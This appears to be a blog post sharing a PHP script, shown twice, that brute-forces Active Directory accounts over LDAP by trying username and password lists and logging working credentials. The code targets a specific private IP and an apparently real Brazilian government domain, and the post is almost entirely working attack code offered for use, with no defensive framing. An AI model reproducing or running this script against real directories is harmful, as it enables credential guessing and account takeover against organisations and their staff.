Here a script to test ldap(Active Directory) users.
Ldap module install:
Quote:~# apt-get install php5-ldap
Use:
Code:
<?php
/*
* Simple Ldap (Active Directory) brute force
* by n4sss.
*
* Need php5-ldap module in php (:
* ~# apt-get install php5-ldap
* ---snip---
*
*
* php ldap_brute.php user_list.txt pass_list.txt log.txt
*
* $AD_server = "IP_AD";
* $domain = "DOMAIN_AD";
*
*
* twt -> @n4sss
*
* */
error_reporting(0);
function save_content($file, $content){
$fp = fopen($file, "a");
fwrite($fp, $content."\r\n");
fclose($fp);
}
function ad_connect($user, $pass, $log){
$AD_server = "172.28.105.254";
$domain = "dpu.gov.br";
$ad = ldap_connect($AD_server);
ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);
foreach($user as $user_id => $user_try){
foreach($pass as $pass_id => $pass_try){
sleep(1); // Edit it, if nescessary (:
if(!empty($user_try)){
$user_try = trim($user_try);
print "[$user_id] Trying user -> $user_try\n";
$bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
if( $bd ){
print "\n+----------------------+\n";
print "[+] $user_try - Password -> $pass_try\n";
print "+------------------------+\n\n";
save_content($log, "$user_try:$pass_try");
}else{
echo "[-] WRONG!\n";
}
ldap_unbind($ad);
}
}
}
}
if(!$argv[1] || !$argv[2] || !$argv[3]){
print "==================================\n";
print "Easy ldap(AD) brute force by n4sss\n";
print "==================================\n";
print "USE:\n";
print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
exit(0);
}else{
$user = explode("\n", file_get_contents("$argv[1]"));
$pass = array_filter(explode("\n", file_get_contents("$argv[2]")));
$log = trim("$argv[3]");
ad_connect($user, $pass, $log);
}
?>
Ldap module install:
Quote:~# apt-get install php5-ldap
Use:
Quote:php ldap_brute.php user_list.txt pass_list.txt log.txt
Code:
<?php
/*
* Simple Ldap (Active Directory) brute force
* by n4sss.
*
* Need php5-ldap module in php (:
* ~# apt-get install php5-ldap
* ---snip---
*
*
* php ldap_brute.php user_list.txt pass_list.txt log.txt
*
* $AD_server = "IP_AD";
* $domain = "DOMAIN_AD";
*
*
* twt -> @n4sss
*
* */
error_reporting(0);
function save_content($file, $content){
$fp = fopen($file, "a");
fwrite($fp, $content."\r\n");
fclose($fp);
}
function ad_connect($user, $pass, $log){
$AD_server = "172.28.105.254";
$domain = "dpu.gov.br";
$ad = ldap_connect($AD_server);
ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);
foreach($user as $user_id => $user_try){
foreach($pass as $pass_id => $pass_try){
sleep(1); // Edit it, if nescessary (:
if(!empty($user_try)){
$user_try = trim($user_try);
print "[$user_id] Trying user -> $user_try\n";
$bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
if( $bd ){
print "\n+----------------------+\n";
print "[+] $user_try - Password -> $pass_try\n";
print "+------------------------+\n\n";
save_content($log, "$user_try:$pass_try");
}else{
echo "[-] WRONG!\n";
}
ldap_unbind($ad);
}
}
}
}
if(!$argv[1] || !$argv[2] || !$argv[3]){
print "==================================\n";
print "Easy ldap(AD) brute force by n4sss\n";
print "==================================\n";
print "USE:\n";
print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
exit(0);
}else{
$user = explode("\n", file_get_contents("$argv[1]"));
$pass = array_filter(explode("\n", file_get_contents("$argv[2]")));
$log = trim("$argv[3]");
ad_connect($user, $pass, $log);
}
?>
0 comments:
Post a Comment